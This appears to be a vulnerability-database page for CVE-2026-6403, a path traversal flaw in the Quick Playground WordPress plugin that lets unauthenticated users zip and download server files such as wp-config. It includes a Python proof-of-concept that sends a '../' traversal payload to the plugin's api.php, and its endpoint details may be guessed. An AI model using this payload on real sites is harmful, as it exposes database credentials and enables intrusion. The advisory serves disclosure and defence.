Security Vulnerability Report
δΈ­ζ–‡
CVE-2026-6403 CVSS 7.5 HIGH

CVE-2026-6403

Published: 2026-05-15 09:16:17
Last Modified: 2026-05-15 14:09:16

Description

The Quick Playground plugin for WordPress is vulnerable to Path Traversal in versions up to and including 1.3.3. This is due to insufficient path validation in the qckply_zip_theme() function, which appends a user-controlled 'stylesheet' parameter directly to the theme root directory path without sanitizing directory traversal sequences. This makes it possible for unauthenticated attackers to trigger the creation of a ZIP archive containing arbitrary files from the server's filesystem β€” including wp-config.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WordPress Quick Playground Plugin <= 1.3.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL (Replace with actual victim URL) target_url = "http://example.com/wp-content/plugins/quick-playground/api.php" # The vulnerable parameter 'stylesheet' used to traverse directories # Attempting to fetch wp-config.php located in the WordPress root directory # The traversal depth depends on the plugin location relative to the root payload = { "action": "download_theme", "stylesheet": "../../../../../../wp-config.php" } try: response = requests.post(target_url, data=payload) # Check if the response contains ZIP file magic bytes if response.status_code == 200 and b'PK' in response.content[:4]: print("[+] Exploit successful! ZIP file received.") # Save the received content to a file with open("exploit_result.zip", "wb") as f: f.write(response.content) print("[+] File saved as exploit_result.zip") else: print("[-] Exploit failed or target not vulnerable.") print("Response:", response.text[:200]) except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-6403", "sourceIdentifier": "[email protected]", "published": "2026-05-15T09:16:16.973", "lastModified": "2026-05-15T14:09:15.910", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Quick Playground plugin for WordPress is vulnerable to Path Traversal in versions up to and including 1.3.3. This is due to insufficient path validation in the qckply_zip_theme() function, which appends a user-controlled 'stylesheet' parameter directly to the theme root directory path without sanitizing directory traversal sequences. This makes it possible for unauthenticated attackers to trigger the creation of a ZIP archive containing arbitrary files from the server's filesystem β€” including wp-config."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/quick-playground/tags/1.3.1/api.php#L62", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/quick-playground/tags/1.3.1/api.php#L631", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/quick-playground/tags/1.3.1/utility.php#L162", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/quick-playground/tags/1.3.1/utility.php#L248", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/quick-playground/trunk/api.php#L62", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/quick-playground/trunk/api.php#L631", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/quick-playground/trunk/utility.php#L162", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/quick-playground/trunk/utility.php#L248", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3514238%40quick-playground&new=3514238%40quick-playground&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3523317%40quick-playground&new=3523317%40quick-playground&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a39dccb6-b635-44af-b0e0-c3010b719773?source=cve", "source": "[email protected]"}]}}